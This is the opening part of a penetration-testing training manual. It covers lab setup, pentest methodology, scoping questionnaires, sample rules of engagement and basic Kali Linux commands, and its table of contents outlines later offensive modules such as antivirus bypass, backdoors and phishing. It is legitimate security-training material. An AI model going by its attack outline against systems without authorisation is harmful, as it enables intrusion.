
TRANCHULAS

Hands-On Ethical Hacking and Penetration Testing
Training Course
Certified Penetration Testing Professional (CPTP)

Delegate Manual
v1.1

Web: www.tranchulas.com | Email: [email protected]


Hands-On Ethical Hacking and Penetration Testing Training Course

All rights reserved to Tranchulas Limited

No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner, including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written permission from Tranchulas Limited.

TRANCHULAS | www.tranchulas.com 2
Table of Contents

Schedule of Training ..... 6
Module 0: Introduction ..... 8
    General Information ..... 9
    Legal ..... 9
    Tranchulas Online Labs ..... 9
    Certification Exam ..... 10
    Support ..... 10
Module 1: VMWare and Kali Linux Installation ..... 11
    Mandatory Laptop Requirements ..... 12
    Installing VMWare on Windows ..... 12
    Setting Up Kali Linux in VMWare ..... 15
    Starting Kali Linux in VMWare ..... 21
    Installing VMWare Tools ..... 28
    Setting up the VPN access ..... 28
Module 2: Planning and Scoping ..... 32
    What is Penetration Testing? ..... 33
    Types of Penetration Testing ..... 33
    Variations of Penetration Test ..... 34
    Penetration Testing Methodology ..... 34
    Penetration Testing Scoping ..... 36
Module 3: Introduction to Kali Linux ..... 46
    Familiarize with Directory Structure ..... 47
    Changing Password ..... 47
    Search Files ..... 48
    Starting Network Services ..... 48
    SSH ..... 49
    VNC Server ..... 50
    Apache ..... 51
    TFTPD ..... 51
Module 4: Information Gathering ..... 53
    Google Hacking ..... 54
    Google Hacking Database ..... 57
    Email Harvesting ..... 58
    Netcraft ..... 59
    Nslookup ..... 60
    DNSEnum ..... 61
    DNSmap ..... 61
    Maltego ..... 62
Module 5: Scanning ..... 68
    Introduction to Port Scanning ..... 69
    TCP Port Scanning ..... 69
    SYN Scanning ..... 69
    UDP Scanning ..... 69
    Legal Implications ..... 69
    Nmap ..... 70
    Scan all available ports ..... 72
    OS Fingerprinting ..... 72
    Scanning the network ..... 73
    Service Enumeration ..... 74
    Zenmap ..... 74
    Nmap Scripting Engine – Basic Usage ..... 75
    Execute SMB Version Scanning Script ..... 75
    Run Default Scripts ..... 76
    Running External Sources Script ..... 76
    Hping ..... 76
    Sparta ..... 78
Module 6: Vulnerability Scanning ..... 80
    What is OpenVAS? ..... 81
    Nexpose Vulnerability Scanner ..... 84
    Nessus Vulnerability Scanner ..... 99
Module 7: ARP Spoofing ..... 108
    What is ARP Spoofing? ..... 109
    Ettercap ..... 109
    DNS Spoofing ..... 110
    SSL Man in the Middle ..... 111
    Traffic Forgery ..... 112
    SSH Downgrade Attack ..... 114
Module 8: Exploitation ..... 117
    Netcat ..... 118
    Metasploit ..... 119
    Msfconsole ..... 119
    Using Exploits ..... 120
    The Famous MS08-067 ..... 123
    Password Sniffing with Metasploit ..... 125
    Footprinting MySQL ..... 125
    SMB Version Scanning ..... 126
    Importing External Modules in Metasploit ..... 126
    Client Side Attacks ..... 127
    Meterpreter Shell ..... 130
    Persistent Backdoors ..... 133
    Linux Trojan ..... 135
    Bypassing Antivirus ..... 137
    FatRat ..... 141
    PDF Exploit ..... 146
    VBScript Infection ..... 148
    Weaponizing Excel Worksheets Using Veil ..... 155
    Pivoting ..... 162
    Cisco Exploits ..... 166
    Phishing ..... 167
    John the Ripper ..... 168
Module 9: More Exploitation ..... 171
    Social Engineering Toolkit ..... 172
    Spear Phishing Attacks ..... 172
    Website Attack Vector ..... 173
    Java Applet Attack Method ..... 174
    Metasploit Browser Exploit Method ..... 174
    Browser autopwn ..... 178
Module 10: Web Application Hacking ..... 180
    Information Gathering ..... 181
    Introduction to Burp Suite ..... 183
    Fingerprinting using Wappalyzer ..... 189
    SQL Injection ..... 190
        Injection Points ..... 191
        Authentication Bypass ..... 193
        Data Extraction ..... 194
        SQL Injection (Union) ..... 196
        SQLMap ..... 199
    Cross Site Scripting (XSS) ..... 203
        Reflected XSS ..... 203
        Stored (Persistent) XSS ..... 205
        iFrame Injection ..... 206
        BeEF ..... 207
    File Inclusions ..... 211
        Local File Inclusion ..... 211
        Remote File Inclusion ..... 214
        Remote File Upload ..... 216
Module 11: Wireless Penetration Testing ..... 219
    Hacking Wireless with Wi-Fi Pineapple Nano ..... 220
    Capture WPA/WPA2 Handshake ..... 228
    WPS Brute Force ..... 235
    Capturing Traffic ..... 239
    Airodump-ng ..... 241
    Aireplay-ng ..... 242
    Demo Attack ..... 244
Module 12: Other Attacks ..... 249
    LAN Turtle ..... 250
References ..... 259

Schedule of Training

Day 1
Start Time Finish Time Module Name
10:00 10:15 Module 1: VMware and Kali Linux Installation
10:15 11:30 Module 2: Planning and Scoping
11:30 13:00 Module 3: Introduction to Kali Linux
13:00 14:00 Lunch Break
14:00 17:00 Module 4: Information Gathering

Day 2
Start Time Finish Time Module Name
10:00 11:00 Module 5: Scanning
11:00 13:00 Module 6: Vulnerability Scanning
13:00 14:00 Lunch Break
14:00 15:30 Module 7: ARP Spoofing
15:30 17:00 Module 8: Exploitation

Day 3
Start Time Finish Time Module Name
10:00 12:00 Module 8: Exploitation (continued)
12:00 13:00 Module 9: More Exploitation
13:00 14:00 Lunch Break
14:00 17:00 Module 9: More Exploitation (continued)

Day 4
Start Time Finish Time Module Name
10:00 11:30 Module 10: Web Application Hacking (continued)
11:30 13:00 Module 11: Wireless Penetration Testing
13:00 14:00 Lunch Break
14:00 15:00 Module 11: Wireless Penetration Testing (continued)
15:00 17:00 Module 12: Other Attacks


Module 0: Introduction


General Information

Understanding attackers and their methods is vital for defending your organization's IT infrastructure. This training course is designed for students who want to get acquainted with the world of hacking. It offers a collection of live demonstrations featuring a variety of attack techniques used by hackers and the defensive techniques that counter them.

Legal

This document describes hacking techniques that should only be performed inside the Tranchulas Lab Environment. Launching the attacks described in this manual against any system without the prior consent and permission of its owner is illegal. Tranchulas assumes no responsibility for any actions performed outside its lab environment.

Tranchulas Online Labs

Tranchulas Online Labs are available 24×7 for practicing the hacking techniques and tools demonstrated by the instructor during the training course. The Online Labs simulate a corporate network with several subnets, each protected by a firewall. Every machine on the network can be exploited, and the machines vary in difficulty.

Students are required to discover and exploit vulnerabilities in order to pass the online labs and receive the Tranchulas Certified Penetration Testing Professional (CPTP) certification.


Certification Exam

The certification exam comprises multiple challenges that put your skills to the test. You will be given multiple targets to exploit and must write a penetration testing report. The exam lasts 24 hours; complete the tasks and submit the report within this time. The targets are similar to the lab machines and require several steps to exploit successfully. A sample report is provided with the exam document once you have scheduled your exam date. You can schedule the exam for any date and time; notify us at least one week before the exam date so that we can make the necessary arrangements.

Support
You can connect to the Tranchulas Online Labs for 90 days after the training course to practice your hacking kung-fu. During this time our technical team provides support by email, phone or Skype to ensure that the skills acquired on the training course are being applied correctly.


Module 1: VMWare and Kali Linux Installation


Mandatory Laptop Requirements

• CPU: 2 GHz or higher
• RAM: 4 GB minimum
• 20 GB of free space on your hard drive
• Wireless 802.11 b/g adapter
• Local administrator access within the operating system, including the ability to disable antivirus if required
• If your primary OS is not Windows, you must also set up a Windows virtual machine on your system

Installing VMWare on Windows

1. Download the latest version of VMware Workstation from:
https://my.vmware.com/en/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation_pro/14_0
2. If you do not already own a copy of VMware Workstation, you can obtain a free 30-day evaluation license.
3. Log on to your Microsoft Windows host as the Administrator user or as a user who is a member of the Windows Administrators group.
4. Browse to the directory where you saved the downloaded installer file and run the installer.
5. Click Next to dismiss the Welcome dialog box.


6. Select Typical Installation.


7. Choose the directory where you want to install VMware Workstation.

8. To install it in a directory other than the default, click Change and browse to your
directory of choice. If the directory does not exist, the installer creates it for you. Click
Next.
9. Caution: Do not install VMware Workstation on a network drive.
10. Select the shortcuts that you want the installer to create.


11. Choices include Desktop, and Start menu. Deselect any shortcuts you do not want the
installer to create.
12. If the installer detects that the Windows CD-ROM autorun feature is enabled, you see a
message that gives you the option to disable this feature. Disabling autorun prevents
undesirable interactions with the virtual machines you install on this system.
13. The installer has gathered the necessary information and is ready to begin installing the
software.


14. If you want to change any settings or information you provided, now is the time to make those changes. Click Back until you reach the dialog box containing the information you want to change.
15. If you do not need to make any changes, click Install. The installer begins copying files to your computer.
16. Some installations require a reboot. Reboot now to allow VMware Workstation to complete the installation correctly.
17. After the installation finishes, the installer prompts for the evaluation key, which you should have received by email.
18. You can enter the key here or skip this step. Skipping it completes the installation, but the key must be entered later before Workstation can be used.

Setting Up Kali Linux in VMWare


1. Start VMware Workstation.
Double-click the VMware Workstation icon on your desktop or use the Start menu (Start
> Programs > VMware > VMware Workstation).
2. Accept the License Agreement when prompted.


3. Start the New Virtual Machine Wizard.

When you start VMware Workstation, you can open an existing virtual machine or create a
new one. Choose File > New > Virtual Machine to begin creating your virtual machine.
4. Select Custom and click Next


5. Download the Kali Linux ISO from https://www.kali.org/downloads/3/ and verify its SHA256 checksum against the checksum file published on the download page before using it. In Guest Operating System Installation, select Installer disc image file (iso) and click Browse. Locate your Kali Linux ISO, select it and click Next.


6. In Select a Guest Operating System select Linux and in drop down select Debian 8.x 64-bit
as version if you have 64 bit ISO or select Debian 8.x if you are using 32 bit version. Click
Next.

7. Give your Virtual Machine a name.


8. Select the hard disk size you want to give this machine; 20 GB is enough for Kali. Set the other resources as well: 1 GB of RAM is enough, but 2 GB is recommended. Change the networking mode from NAT to Bridged. In Bridged mode the VM gets its own address on the same network as the host, rather than sharing the host's address behind NAT.


9. Select LSI Logic for the Controller Types and SCSI for Disk Type.


10. Launch your machine

Starting Kali Linux in VMWare


1. Click the Power On button to start the virtual machine.
2. Select Graphical Install.


3. Select your preferred language and then your country location. You’ll also be prompted
to configure your keyboard with the appropriate keymap.


4. The installer will copy the image to your hard disk, probe your network interfaces, and
then prompt you to enter a hostname for your system. In the example below, we’ve
entered “kali” as our hostname.

5. Enter a strong password for the root account.


6. Select your time zone.

7. The installer will now probe your disks and offer you four choices. In our example, we’re
using the entire disk on our computer and not configuring LVM (logical volume manager).
Experienced users can use the “Manual” partitioning method for more granular
configuration options.


8. Select All files in one partition

9. Next, you’ll have one last chance to review your disk configuration before the installer
makes irreversible changes. After you click Continue, the installer will go to work and
you’ll have an almost finished installation.

10. Configure network mirrors. Kali uses a central repository to distribute applications; enter proxy information if your network requires it. Select Yes.

11. Install the GRUB boot loader.


12. Finally, click Continue to reboot into your new Kali installation.

13. Go to Terminal


14. Run the following commands:

root@kali:~# apt-get update
root@kali:~# apt-get upgrade
root@kali:~# apt-get dist-upgrade

Enter Y when prompted. Downloading and installing the updated packages will take some time.

Installing VMWare Tools:

To install VMware Tools, open a terminal and enter the following commands:

root@kali:~# apt-get install open-vm-tools-desktop fuse
root@kali:~# reboot

VMware Tools should be working after the reboot.

Setting up the VPN access:

1. To access the training environment, you need to set up the VPN in Kali Linux. You will receive a zip file from the Tranchulas Training Team containing all the VPN files. Extract the files.

TRANCHULAS | www.tranchulas.com 28
Hands-On Ethical Hacking and Penetration Testing Training Course

You will get a folder named untangle-vpn. Folder includes the necessary files required for setting
up VPN connection.
2. Now run the following command

root@kali:~# apt-get install network-manager-openvpn

3. Restart Kali Linux.

4. Now go to Settings by clicking the power button icon at the top right of the screen.

5. Go to Network and click on the + button.

6. Click on VPN.

7. Select Import from file.


8. Select the .ovpn file from the directory where you have extracted the zip.

9. It will automatically populate the settings. Now click Add.


10. Turn on the VPN.


Module 2: Planning and Scoping


What is Penetration Testing?


Penetration testing is a controlled and managed simulation of a computer system intrusion. It
gives a realistic experience of an attempted break-in into a network, system or application.
During a penetration test, security mechanisms as well as intrusion detection and response
capabilities are put to the test against a skilled, motivated attacker - only this time the owner of
the target has complete insight. This is a unique opportunity to get to know your enemy and the
harm they may cause, without the damage you would sustain in a real attack.

Penetration Testing helps organizations to:

• Understand threats for better defense
• Determine risk to make informed IT decisions
• Test incident handling procedures
• Test intrusion detection and prevention systems
• Identify how your security is working overall in your organization

Penetration Testing is not:

• Using vulnerability scanners to generate a report
• An activity that will identify 100% of vulnerabilities

Types of Penetration Testing:

There are two types of penetration testing:
1. External Penetration Testing: External pen-testing addresses the ability of a remote
attacker to get to the internal network. The goal of the pen-test is to access specific
servers and crown jewels within the internal network by exploiting externally exposed
servers, clients, and people. Whether it's an exploit against a vulnerable Web application
or tricking a user into giving his password over the phone, allowing access to the VPN, the
end game is getting from the outside to the inside. This testing focuses on the
infrastructure components, servers, and the related software of the target. It also
provides a detailed analysis of the information that is available from public sources, such
as the Internet. Enumeration of the network is also performed and analyzed. The filtering
devices, such as firewalls and routers, are also scrutinized for their vulnerabilities. Finally,
the impact and consequences are assessed.
2. Internal Penetration Testing: Internal penetration testing simulates what an insider
attack could accomplish. The target is typically the same as in external pen-testing, but the
major differentiator is that the "attacker" either has some sort of authorized access or is
starting from a point within the internal network. Insider attacks have the potential of
being much more devastating than an external attack because insiders already have
knowledge of what's important within a network and where it's located, something that
external attackers don't usually know from the start.


Variations of Penetration Test:

The two types of penetration test have three variations, each depending on the degree of knowledge
provided by the target company to the pen testing team.
1. Black Box Testing: This testing does not provide the tester with any information and is
therefore a much better testing method, because crackers and script kiddies normally
do not have any information that is directly obtained from the target company and need
to gather their information from public sources. It simulates real-world attack scenarios.
The steps of mapping the network, enumerating shares and services, and operating
system fingerprinting are typical for black box testing.
2. White Box Testing: For this, related information is provided, in order to assess the
security against specific attacks or specific targets. This is the chosen method when the
company needs to get a complete audit of its security.
3. Grey Box Testing: In this testing, some knowledge is provided to the testers, which
puts the tester in a privileged position. This would normally be the preferred method
when cost is a factor, as it saves the pen testing team the time needed to uncover information
that is publicly available. This approach is also suitable when the organization needs
to obtain knowledge of the security assessment practices.

Penetration Testing Methodology:

Penetration testing follows a three-phase approach. The three phases are:
Phase – I Planning and Preparation
Phase – II Assessment
Phase – III Reporting and Clean-up

Phase – I: Planning and Preparation

This phase comprises the steps to exchange initial information, and to plan and prepare for the test.
Prior to testing, a formal Assessment Agreement will be signed between both parties. It will
provide the basis for the assignment and mutual legal protection. It will also specify the
engagement team, the exact dates and times of the test, the escalation path and other arrangements.
The following activities are envisaged in this phase:

• Identification of contact individuals from both sides,
• Opening meeting to confirm the approach and methodology, and
• Agreement on specific test cases and escalation paths

Phase – II: Assessment

This is the phase where the pen testing team will actually carry out the penetration test. In the
assessment phase a layered approach is followed. The following layers are envisaged:

• Information Gathering
• Network Mapping
• Vulnerability Identification
• Penetration
• Gaining Access & Privilege Escalation
• Enumerating Further
• Compromise Remote Users/Sites
• Maintaining Access
• Covering Tracks
The execution steps are cyclical and iterative, and are hence represented by the circular arrows in
the assessment phase in the figure below:


Phase – III: Reporting and Clean-up

If a critical issue is identified in the course of penetration testing, it must be reported immediately
to ensure that the client is aware of it. At this point the criticality of the issue should be discussed
and countermeasures to safeguard against it must be provided.
After the completion of all test cases defined in the scope of work, a written report describing the
detailed results of the tests and reviews should be prepared, with recommendations for
improvement. The report should follow a well-documented structure. The report must contain
at least the following sections:
a) Management Summary
b) Scope of the project (and Out of Scope parts)
c) Tools that have been used (including exploits)
d) Dates & times of the actual tests on the systems
e) Every single output of tests performed (excluding vulnerability scan reports, which can be
included as attachments)
f) A list of all identified vulnerabilities with recommendations on how to solve the
issues found.
g) A list of Action points (which recommendation to perform first, what the recommended
solution is)

Penetration Testing Scoping:

Sample Scope Sheet


Introduction
In order to size the work to be carried out correctly, we ask you to please complete
the following form as accurately as possible.

Personal Information
Complete Name:
Company:
Position:
Email:

Type of Analysis
Please select the type of analysis required. Internal Penetration Tests are performed from the
LAN or DMZ standpoint of the company, while the External Penetration Tests are performed from
the Internet, with the same exposure that a potential intruder has:


Internal Penetration Test
External Penetration Test

Domains
Please list the domains belonging to the company or organization:
1)
2)
3)
4)

Network Security Assessment

In this section, you need to list the network elements that will be part of the security
assessment. Each field requires the number of such elements within the network. For example,
in "Public IP Addresses" you must enter 1, 8, 24, or however many addresses
you want to analyze.

Public IP Addresses:
Routers:
Firewalls:
VPN tunnels:
DNS servers:
Mail servers:
FTP servers:
SSH servers:
Database servers:
HTTP servers:
Other services or equipment that you would like to include in the assessment (please be specific):

Web Application Security Assessment


Access URL:
Main Web Application feature:
Approximated number of URLs:
Describe the application sections:
Approximated number of URLs accessible only after authentication:
Approximated number of Web forms:
List the different types of users (roles) that access the application:
List the programming languages used to develop the Web application:
List the used Web development frameworks (e.g. Smarty, HDIV, Spring, Spring Security, Django):
ActiveX components are used in the Web application:
The application uses Flash heavily (check yes, if you use Flash for more than menus and banners):
The application uses Java applets:
The application uses AJAX:
The application handles sensitive customer information from the company:
The application is used to make purchases online or other tasks where money is involved directly:
Backend database used:
The Web application has interfaces with other systems (Tandem, Web services, mail servers, etc.):
Number of users using the application:
Describe in detail the application:

Example Form
The following is a form pre-completed by Tranchulas so that you have an example in case you are
unsure how to complete any of the previous sections.
Web Application:
Access URL: http://www.tranchulas.com
Main Web Application feature: It provides clients with access to information on services that
are conducted by Tranchulas.
Approximated number of URLs: 15
Describe the application sections: It has different sections which give information on the
services of the company and the products offered. The list of trainings and the events
conducted by Tranchulas is also given.
Approximated number of URLs accessible only after authentication: 20
Approximated number of Web forms: 3
List the different types of users (roles) that access the application: Tranchulas Employees and
Tranchulas Clients
List the programming languages used to develop the Web application: HTML, PHP
List the used Web development frameworks (e.g. Smarty, HDIV, Spring, Spring Security, Django):
None
ActiveX components are used in the Web application: No
The application uses Flash heavily (check yes, if you use Flash for more than menus and banners):
No
The application uses Java applets: No
The application uses AJAX: No
The application handles sensitive customer information from the company: No
The application is used to make purchases online or other tasks where money is involved directly:
Yes
Backend database used: SQL
The Web application has interfaces with other systems (Tandem, Web services, mail servers,
etc.): SMTP daemon used to send emails to clients.
Number of users using the application: 100
Describe in detail the application: It has 5-6 different sections which deal with giving out
information on the activities/services and products offered by Tranchulas. The clients also have
the option of contacting the company as well as paying online through the website.

Scoping Questions
When you first start communicating with the customer there will be a set of questions that you
will need answered before you can accurately scope the penetration test engagement. These
questions are critical to ask and should give you a better understanding of what the client is
looking to gain out of the penetration test, why the client is looking to have a penetration test
performed against their environment, and whether or not they want certain types of tests
performed during the penetration test.
The following are some sample questions that may need to be answered before you can even
accurately quote how much the engagement is going to cost the customer:

Network Penetration Test

1. Why is the customer having the penetration test performed against their environment?
2. Is the penetration test required for a specific compliance requirement?
3. When does the customer want the active portions (scanning, enumeration, exploitation,
etc.) of the penetration test conducted?
4. During business hours?
5. After business hours?
6. On the weekends?
7. How many total IP addresses are being tested?
8. How many internal IP addresses, if applicable?
9. How many external IP addresses, if applicable?
10. Are there any devices in place that may impact the results of a penetration test such as a
firewall, intrusion detection/prevention system, web application firewall, or load
balancer?
11. In the case that a system is penetrated, should we:
a) Perform a local vulnerability assessment on the compromised machine?
b) Attempt to gain the highest privileges (root on Unix machines, SYSTEM or Administrator
on Windows machines) on the compromised machine?
c) Perform no, minimal, dictionary, or exhaustive password attacks against local password
hashes obtained (for example, /etc/shadow on Unix machines)?

Web Application Penetration Test

1. How many web applications are being assessed?
2. How many login systems are being assessed?
3. How many static pages are being assessed? (approximately)
4. How many dynamic pages are being assessed? (approximately)
5. Will the source code be readily available for viewing?
6. Will there be any kind of documentation, and if yes, what kind of documentation?
7. Will we be performing static analysis on this application?
8. Does the client want us to perform fuzzing against this application?
9. Does the client want us to perform role-based testing?
10. Does the client want us to perform credentialed scans of web applications?
Wireless Network Penetration Test

1. How many wireless networks are in place?
2. Is a guest wireless network used? If so:
3. Does the guest network require authentication?
4. What type of encryption is used on the wireless networks?
5. What is the square footage of coverage?
6. Will we be enumerating rogue devices?
7. Will we be assessing wireless attacks against clients?
8. Approximately how many clients will be using the wireless network?

Physical Penetration Test

1. How many locations are being assessed?
2. Is this physical location a shared facility? If so:
3. How many floors are in scope?
4. Which floors are in scope?
5. Are there any security guards that will need to be bypassed? If so:
6. Are the security guards employed through a 3rd party? Are they armed? Are they allowed
to use force?
7. How many entrances are there into the building?
8. Is the use of lock picks or bump keys allowed?
9. Will we be performing a physical penetration test to verify compliance with existing
policies and procedures, or just performing an audit?
10. What is the square footage of the area in scope?
11. Are all physical security measures documented?
12. Are video cameras being used? If so, and they are client owned:
13. Does the client want us to attempt to gain access to where the video camera data is
stored?
14. Is there an armed alarm system being used? If so:
15. Is the alarm a silent alarm?
16. Is the alarm triggered by motion?
17. Is the alarm triggered by opening of doors and windows?

Social Engineering
1. Will the client provide e-mail addresses of personnel that we can attempt to social
engineer?
2. Will the client provide phone numbers of personnel that we can attempt to social
engineer?
3. Will we be attempting to social engineer physical access? If so:
4. How many people will be targeted?
It should be noted that, depending on the level of testing, the questions for business unit
managers, systems administrators and help desk personnel may not be required. However, feel
free to use the following questions as a guide.


Questions for Business Unit Managers

We cannot ignore the business unit managers when a test is being performed. These tend to be
the individuals who would be most impacted if a DoS condition occurred.
1. Do you know a test is about to be performed?
2. What is the main datum that would create the greatest risk to the organization if exposed,
corrupted or deleted?
3. Do you have testing and validation procedures to verify your business applications are
functioning properly?
4. Do you have your Quality Assurance testing procedures from when the application was
first developed?
5. Do you have Disaster Recovery Procedures for your application data?

Questions for System Administrators

We cannot ignore the power of systems administrators in security and in penetration testing.
They know their systems far better than anyone else in their organizations, and if something goes
wrong they are most likely going to be the people on the front lines restoring operations. Many
of the questions below are based on the concept of Visible Operations.
1. Can you identify your fragile systems? (Ask about systems with tendencies to crash, have
older operating systems, or are not patched for any reason)
2. Are there systems on the network that IT does not own, that may require additional
approval to test?
3. Do you have Change Management procedures in place?
4. What is the mean time to repair system outages?
5. Do you have any systems monitoring software in place?
6. What are your most critical servers and applications?
7. Do you test backups on a regular basis?
8. When was the last time you restored from backup?

Exercise
Find gaps in sample scope sheet.

Sample Rules of Engagement

1. The purpose of having the “Rules of Engagement” is to clearly establish the scope of work
and the procedures that will and will not be performed, by defining time frames, test
rules, and points of contact.
2. Penetration Test Purpose: The purpose is to assess the vulnerability of the customer’s IT
infrastructure and supporting Information Technology infrastructure regarding
unauthorized access from outside and inside of the customer’s organization. The procedures
are designed to be non-intrusive and are intended to validate the security configuration
controls that protect systems that are relevant to Company X targets.
3. Penetration Test Objective: The objectives of the testing are to:
a) Evaluate the protection of the customer’s information technology assets (i.e., data,
systems, and processes), with a special emphasis on the effectiveness of logical access
and system software controls
b) Provide value to the customer’s IT infrastructure by identifying opportunities to
significantly strengthen applicable controls within budgetary and operational
constraints
4. Scope: Company X penetration procedures will remotely (via internet) test (targeting
email addresses of customer employees, finding critical information through public
sources) as well as locally (within customer’s facilities) scan all network, applications,
database and servers supporting customer as well as any other IT infrastructure
components deemed critical in supporting customer’s operating environment.
Company X test procedures will use non-destructive testing techniques (i.e., no files or
data on the target systems are to be modified, added, deleted, or changed). Evidence to
support any access control weaknesses discovered should consist primarily of screen
prints and session logs.
5. Activities to be conducted: Following activities are associated with black box penetration
testing:
a) Identify Targets.
b) Identify Potential Vulnerabilities.
c) Perform Vulnerability Scans.
d) Identify and exploit improperly configured network services.
e) Identify and exploit insecure authentication mechanisms.
f) Identify outdated network services that have known vulnerabilities.
g) Apply enumeration data in searching vulnerable databases.
h) Perform manual tests.
i) Password guessing.
j) IP spoofing.
k) Social engineering.
l) Use Trojan and rootkit Attacks.
m) Use keylogging and bugging.
n) Manipulating routing tables.
o) Identify and exploit of rogue devices.
p) Research and develop attack scenarios.
q) Execute attacks.
r) Record results.
s) Report exploitable vulnerabilities.
t) Analyze penetration testing results and if indicated, perform additional exercises.

u) Recommend countermeasures.
6. Assessment Tools: Most of the testing will be performed on the Linux distribution Kali
Linux. Some customized Windows-based tools might also be used by the Company X team.
The Company X team will also prepare its own customized tools/scripts.
7. Wireless Testing Tools: An Alfa wireless adapter (AWU036H) will be used to conduct wireless
attacks.
8. Rules to be Followed: The following are agreed upon rules that will be followed as part
of this penetration test:
a) Designated customer representatives will observe and/or be readily available to
discuss while in progress all Company X penetration/exploitation activities.
b) Penetrations into customer systems will only be pursued insofar as they could
lead to access to significant systems or are significant to the entity-wide security
program of the overall network environment.
c) All passwords compromised during testing will be reported to the designated contact
for resetting.
d) All Company X reports and work papers will be clearly labeled “Limited Distribution”.
e) A full network scan will be performed. A targeted network scan will be completed and
limited to the subnets and targeted hosts, so as to control and further minimize load
on the network infrastructure.
f) Company X team will refrain from any denial-of-service attempts.
g) In its penetration efforts, Company X will at no point alter or delete any directories or
files.
h) Trojans and backdoors will be removed and unloaded at the conclusion of test.
i) Utmost care will be exercised not to disable user IDs for any extended period of time.
For any user ID found to be inadvertently disabled, we will notify the customer test
monitor and/or appropriate engagement coordinator to enable the prompt
restoration of access.
j) Any procedures that have potential negative impact on network traffic or interruption
will be avoided. Where necessary to demonstrate to Customer the full nature and
extent of vulnerability, such procedure will both be performed during off-peak hours
and will be demonstrated to Customer’s management.
9. Notification Procedures: An appointed Customer designee will review Company X
activities to validate that testing is performed in accordance with these Rules of
Engagement.
10. Reporting: The results of this review will be presented only to designated officials of
Customer.
11. Agreement to Test Objectives: The following parties have acknowledged and agree to
the test objectives, scope, rules to be followed and the notification procedures. Signature
below constitutes authorization to Company X to commence with the penetration test
described above.

Module 3: Introduction to Kali Linux


Familiarize with Directory Structure

Open Terminal.
List the contents of your home directory by typing the following command:

root@kali:~# ls
Desktop Documents Downloads Music Pictures Public
Templates Videos
root@kali:~#

To get detailed information about the directories, use the following command:

root@kali:~# ls -l
total 32
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Desktop
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Documents
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Downloads
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Music
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Pictures
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Public
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Templates
drwxr-xr-x 2 root root 4096 Oct 31 08:54 Videos

To change directory, type the following command:

root@kali:~# cd Desktop/
root@kali:~/Desktop# cd /bin/
root@kali:/bin#

Changing Password

root@kali:~# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@kali:~#


Search Files
Run the updatedb command to build a local database of all files on the filesystem before running
the locate utility.

root@kali ~ # updatedb
root@kali ~ # locate password.txt
/usr/share/cisco-torch/password.txt

Starting Network Services

To check your current IP address, open a terminal and type:

root@kali ~ # ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0c:29:7f:14:1f
inet addr:192.168.1.113 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe7f:141f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:493 errors:0 dropped:0 overruns:0 frame:0
TX packets:29 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:47638 (47.6 KB) TX bytes:3184 (3.1 KB)

Here eth0 is the interface name.

If you don’t get an IP address from DHCP, your network requires you to assign a static IP. Let’s
assume the following network settings:

• Host IP: 192.168.1.3
• Subnet mask: 255.255.255.0
• Default gateway: 192.168.1.1
• DNS Server: 192.168.1.100

root@kali ~ # ifconfig eth0 192.168.1.3/24
root@kali ~ # route add default gw 192.168.1.1
root@kali ~ # echo nameserver 192.168.1.100 > /etc/resolv.conf


SSH
Secure Shell (SSH) is a network protocol that allows data to be exchanged over a secure channel
between two networked devices. The SSH server can be used for SSH tunneling, remote access,
etc.
If you are running Kali Linux for the first time after installation, you need to generate new SSH
host keys before starting this service. Follow the steps below to generate the keys:
First create a directory named default_kali_keys using the mkdir command, then move the
ssh_host_* files into the newly created directory.

root@root:~# cd /etc/ssh
root@root:/etc/ssh# mkdir default_kali_keys
root@root:/etc/ssh# mv ssh_host_* default_kali_keys/

Now we will reconfigure the SSH server, which creates a fresh set of host keys:

root@root:/etc/ssh# dpkg-reconfigure openssh-server
Creating SSH2 RSA key; this may take some time ...
Creating SSH2 DSA key; this may take some time ...
Creating SSH2 ECDSA key; this may take some time ...
insserv: warning: current start runlevel(s) (empty) of script `ssh' overrides LSB defaults (2 3 4
5).
insserv: warning: current stop runlevel(s) (2 3 4 5) of script `ssh' overrides LSB defaults
(empty).

Create an MD5 hash of the ssh_host_* files (these are all the key files):

root@root:/etc/ssh/default_kali_keys# md5sum ssh_host_*
7d7bbb97743c0bba379a3362ad9b20b1 ssh_host_dsa_key
6adef7ad7490147afc667bdcc1f907dc ssh_host_dsa_key.pub
f39c4836cddd24e16a9d64d4370117fa ssh_host_ecdsa_key
c5f0bf794433b8de356168f3bafe482d ssh_host_ecdsa_key.pub
0e29301d2d391806f2e67efa14dc5baf ssh_host_rsa_key
491f88b015519fa2e3ea6d2b99b4d1f5 ssh_host_rsa_key.pub


Move to the default_kali_keys directory and create an MD5 hash of all the files:

root@root:/etc/ssh# cd default_kali_keys/
root@root:/etc/ssh/default_kali_keys# md5sum *
7d7bbb97743c0bba379a3362ad9b20b1 ssh_host_dsa_key
6adef7ad7490147afc667bdcc1f907dc ssh_host_dsa_key.pub
f39c4836cddd24e16a9d64d4370117fa ssh_host_ecdsa_key
c5f0bf794433b8de356168f3bafe482d ssh_host_ecdsa_key.pub
0e29301d2d391806f2e67efa14dc5baf ssh_host_rsa_key
491f88b015519fa2e3ea6d2b99b4d1f5 ssh_host_rsa_key.pub

Now start SSH:

root@root:~# service ssh start

To verify the server is up, type the following command:

root@root:~# netstat -antp | grep 22
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 4202/sshd
tcp6 0 0 :::22 :::* LISTEN 4202/sshd

To stop the SSH server:

root@root:~# service ssh stop
